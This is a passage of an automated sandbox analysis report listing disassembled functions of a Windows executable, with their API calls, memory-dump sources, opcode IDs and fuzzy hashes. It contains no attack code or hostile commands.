                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00EA8D52
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00EA8D59
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00EA8F3A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a39f8255313e1325082b7cc3356ada6c919e2d822c317534747146fa702dbaaf
                                                                                                                                                                                                                                                                                                    • Instruction ID: a0ac839db3997671c21fa5c79724b4acbbec2ebb749bb6b476b0c1aa481a7e69
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a39f8255313e1325082b7cc3356ada6c919e2d822c317534747146fa702dbaaf
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74127B71A083019FC724DF28C584B5ABBE5BF89318F04995DE889AB352DB30E945CF92
                                                                                                                                                                                                                                                                                                    Function 00E3FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E261A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E26299
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00E3FD36
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E3FD45
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E7FE33
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 88b9713cd161d4e4b1a8ecc40f6007c50fde45845d254d249901ddaf9a88fe25
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9aa85ee81936180a859fed35d9f281126aaaae692802edf8df70f101abaff615
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88b9713cd161d4e4b1a8ecc40f6007c50fde45845d254d249901ddaf9a88fe25
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3031C571904354AFEB32CF248859BE7BBECAB02308F0054AED6DD77242D7745A85CB51
                                                                                                                                                                                                                                                                                                    Function 00E5970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00E597BA,FF8BC369,00000000,00000002,00000000), ref: 00E59744
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00E597BA,FF8BC369,00000000,00000002,00000000,?,00E55ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00E46F41), ref: 00E5974E
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E59755
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 337c6f1cfb740cf0b6d2eb7a6726b2818626b953157c6ae48b03342a16af58c9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1dd8555f4dbba628b8bf1ddb44ca4493117394143eacd303c235a2d25146e7a0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 337c6f1cfb740cf0b6d2eb7a6726b2818626b953157c6ae48b03342a16af58c9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E401F532620114EF8B059F9AEC058AE3B69DB89731F24065AFC11A7191EA309D558B90
                                                                                                                                                                                                                                                                                                    Function 00E31990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 632b36cb30b4fec5f3e27b62a0f02d5a56496cc577b7430fb35d8377fc7b9619
                                                                                                                                                                                                                                                                                                    • Instruction ID: f91fef71661f5af2d60bc10e0ebfc5de8a4eab80cee11500d04f28742c6da162
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 632b36cb30b4fec5f3e27b62a0f02d5a56496cc577b7430fb35d8377fc7b9619
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC32DB30A00615DFDB24DF64D885BEEBBB4EF05318F14A5A8E919BB2A1E731ED40CB51
                                                                                                                                                                                                                                                                                                    Function 00E2396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E23A3C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b826f7cb23952519f11a685f2ff446cb1308584ce03b528a0859ab5e667cfa7c
                                                                                                                                                                                                                                                                                                    • Instruction ID: a247a02bb8f30ab54d2da00296e57170c6ad1b9dac50614e3ca66259e192e0c5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b826f7cb23952519f11a685f2ff446cb1308584ce03b528a0859ab5e667cfa7c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F23195B15057119FD320DF35E8847A7BBE8FB89708F00092DE6D9A7241E775A948CF52
                                                                                                                                                                                                                                                                                                    Function 00E2331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00E2333D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E232E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E232FB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E232E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E23312
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E23368,?), ref: 00E233BB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E23368,?), ref: 00E233CE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EF2418,00EF2400,?,?,?,?,?,?,00E23368,?), ref: 00E2343A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00EF2418,?,?,?,?,?,?,?,00E23368,?), ref: 00E234BB
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00E23377
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1f704380bbeff5b6b97e447318ad81692d0a5d7447e543e569a78c0078842c6e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6c43adafce9b4e8a48fa1e3ac5393e3022ec61a87416b1fdc5685c2c917f12d7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f704380bbeff5b6b97e447318ad81692d0a5d7447e543e569a78c0078842c6e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFF030B255A3569FD300AF71FC0BB7937A4A740719F00581AB609750E2DBBA9559CB40
                                                                                                                                                                                                                                                                                                    Function 00E3FFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 252777609-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                    • Instruction ID: d9d19f64fdce3e8db4bf8eb41f950d5a19b9ba4dd761f4602a00d76fcc927153
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2731E671A00105DFC718CF58E490AA9FBB6FF99304B249AA5E509EB652D732EDC1CBC0
                                                                                                                                                                                                                                                                                                    Function 00E2CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00E2CEEE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4153dd98a34489e4de79ae05f74719bdd7f83c1015a993874de31dea49b96bea
                                                                                                                                                                                                                                                                                                    • Instruction ID: 987c28e7c448e67ae0cdaf99c51d2875a280ac6f9e84090e15e285809cd86d1a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4153dd98a34489e4de79ae05f74719bdd7f83c1015a993874de31dea49b96bea
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC32E174A002199FCB24CF58D885ABEBBF5FF45308F28A099E919BB251C770ED45CB90
                                                                                                                                                                                                                                                                                                    Function 00EA7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 44c72af55b063cb32b5ab528dd6d50709df2b98277ae7327e52d6040c5bb5f3d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 48cbf804519137cba1536ff5e22dccccb4985628143a91dd749568fce81e0b9d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44c72af55b063cb32b5ab528dd6d50709df2b98277ae7327e52d6040c5bb5f3d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FD18B74A0420AEFCF14EF98D8819EDBBB5FF49314F149099E955BB291DB30AE41CB90
                                                                                                                                                                                                                                                                                                    Function 00E4F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: c9dac85045a2980b5d6ed7b50ffe6f666ed5a3b5fa6dae9631e8be81a73202b8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 41d8a69ec6c5c908e595cc81f9b34133cbf8a9044059200964d04cd45f97c871
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9dac85045a2980b5d6ed7b50ffe6f666ed5a3b5fa6dae9631e8be81a73202b8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F51DC35A00104AFDB10DF69E840EA97BE1EF85764F1991A8E818BB362D771DD42CB50
                                                                                                                                                                                                                                                                                                    Function 00E8FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00E8FCCE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: efd6c3209fc738f4d260269ccb9222ab7b4e24c794f167d5478bc31f1b37a09b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7505322d6c65a435a36486a8520171dc4dd5acf2539542dae6b84b4591394fed
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efd6c3209fc738f4d260269ccb9222ab7b4e24c794f167d5478bc31f1b37a09b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6141A776500209AFCB11EF68D881AEEB7F8EF44314B11553EE61AE7291EB70DE05CB50
                                                                                                                                                                                                                                                                                                    Function 00E26679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E2668B,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E2664A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E2665C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2663E: FreeLibrary.KERNEL32(00000000,?,?,00E2668B,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E2666E
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E266AB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E26607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E65657,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E26610
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E26607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E26622
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E26607: FreeLibrary.KERNEL32(00000000,?,?,00E65657,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E26635
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9a5363478b75741eac3c1f14a43fcda37bf10e5b9286cc86dcfb0a5aa32f4d58
                                                                                                                                                                                                                                                                                                    • Instruction ID: 318c2749001a51aa78ab6d0db8d9d1f1e355e74ffbfc345d35c4a4fae10485c8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a5363478b75741eac3c1f14a43fcda37bf10e5b9286cc86dcfb0a5aa32f4d58
